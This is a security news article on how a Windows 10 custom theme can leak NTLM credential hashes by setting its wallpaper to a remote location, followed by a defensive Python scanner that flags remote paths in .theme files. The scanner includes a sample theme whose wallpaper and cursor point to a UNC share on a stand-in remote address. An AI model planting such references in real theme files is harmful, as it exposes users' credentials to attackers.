
Custom Windows 10 Themes Can Be Abused To Steal User Credentials

A security researcher has discovered that Windows 10 themes can be used to steal users’ credentials with a technique called pass-the-hash. This is possible because of a loophole in the operating system’s support for loading custom themes.




Windows 10 Custom Themes Can Be Abused To Steal Users’ Data

Windows 10 allows users to install custom themes, and this has recently been identified as an entry point for abuse. The warning came from security researcher Jimmy Bayne, who discovered a dangerous loophole that hackers can take advantage of. It stems from the ability to install themes obtained from a third-party site or repository. The researcher notes that malicious actors can use this to carry out an attack known as Pass-The-Hash.

In this attack model, hackers create themes whose settings trigger a preset sequence of behaviour as soon as the theme is activated. When that happens, the user is shown a prompt asking them to enter their credentials: the theme redirects to a specially created remote page that hosts this form.


The .theme file associated with a given theme can be written so that its default wallpaper setting points to a web location. If users enter their computer login credentials, those credentials are forwarded to the hackers. Even though the credential is transmitted as an NTLM hash rather than in clear text, it can be cracked with readily available software. Such attacks are especially dangerous because they can be combined with other types of malware to coordinate advanced infections.

Possible countermeasures available to computer administrators include restricting installation by blocking the theme file extensions. On domain-joined or workgroup computers, a group policy can be used to restrict the sending of NTLM credentials to remote hosts; however, this can interfere with enterprise setups that rely on NTLM for remote logon. The issue was reported to Microsoft, but for now it will not be fixed, as the company’s staff stated that this is a “feature by design”.
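The two defensive angles above (the .theme file’s wallpaper setting pointing at a remote location, and blocking theme file extensions) can be turned into a simple inspection routine. The following is an added example, not code from the article or from the researcher; it assumes only the documented INI layout of .theme files, in which the [Control Panel\Desktop] section carries the Wallpaper key. It goes a little beyond the article by checking every value in the file, not just the wallpaper, since cursor, sound and slideshow paths in the same file could equally point off-host. The sample theme contents are constructed for the example.

```python
"""Inspect Windows .theme files for values that point to remote hosts.

Added example (not part of the original article). A .theme file is a plain
INI text file; the [Control Panel\Desktop] section's Wallpaper key is the
setting the article describes. Every key/value pair is checked, so other
path-bearing keys (cursors, sounds, slideshow folders) are covered too.
"""
import configparser
import re
from pathlib import PureWindowsPath

# File extensions Windows associates with theme installation.
# .themepack/.deskthemepack are the packaged (zipped) forms of .theme.
THEME_EXTENSIONS = {".theme", ".themepack", ".deskthemepack"}

# A value is treated as remote if it is a UNC path (\\host\share\...)
# or any URL (scheme://...). Local drive paths and %SystemRoot%-style
# environment references do not match.
_REMOTE_RE = re.compile(r"^\s*(\\\\[^\\]+\\|[a-z][a-z0-9+.-]*://)", re.IGNORECASE)

# Constructed benign sample: everything resolves under the local Windows directory.
BENIGN_THEME = r"""
; constructed sample theme
[Theme]
DisplayName=Corporate Blue

[Control Panel\Desktop]
Wallpaper=%SystemRoot%\web\wallpaper\Windows\img0.jpg
TileWallpaper=0
WallpaperStyle=10

[VisualStyles]
Path=%SystemRoot%\resources\Themes\Aero\Aero.msstyles
"""

# Constructed suspicious sample: wallpaper and a cursor both reference a UNC
# share on a documentation-range (TEST-NET-3) address standing in for a remote host.
SUSPICIOUS_THEME = r"""
; constructed sample theme
[Theme]
DisplayName=Free Dark Theme

[Control Panel\Desktop]
Wallpaper=\\203.0.113.10\share\bg.jpg
TileWallpaper=0
WallpaperStyle=10

[Control Panel\Cursors]
Arrow=\\203.0.113.10\share\arrow.cur
"""


def is_theme_file(filename: str) -> bool:
    """True if the file name carries one of the theme extensions an admin would block."""
    return PureWindowsPath(filename).suffix.lower() in THEME_EXTENSIONS


def parse_theme(text: str) -> configparser.ConfigParser:
    """Parse .theme text as INI; keep key case and disable %-interpolation."""
    parser = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    parser.optionxform = str  # preserve key spelling as written in the file
    parser.read_string(text)
    return parser


def find_remote_references(text: str) -> list[tuple[str, str, str]]:
    """Return (section, key, value) for every value that points off-host."""
    parser = parse_theme(text)
    hits = []
    for section in parser.sections():
        for key, value in parser.items(section):
            if _REMOTE_RE.match(value):
                hits.append((section, key, value))
    return hits


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_THEME), ("suspicious", SUSPICIOUS_THEME)):
        hits = find_remote_references(sample)
        verdict = "remote references found" if hits else "no remote references"
        print(f"{label}: {verdict}")
        for section, key, value in hits:
            print(f"  [{section}] {key} = {value}")
```

Run against a directory of downloaded theme files, `is_theme_file` gives the allow/block decision the article’s first countermeasure describes, while `find_remote_references` surfaces the wallpaper (or any other) setting that would make the machine reach out to a remote host and present NTLM credentials.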


Martin Beltov

Martin graduated with a degree in Publishing from Sofia University. As a cyber security enthusiast, he enjoys writing about the latest threats and mechanisms of intrusion.
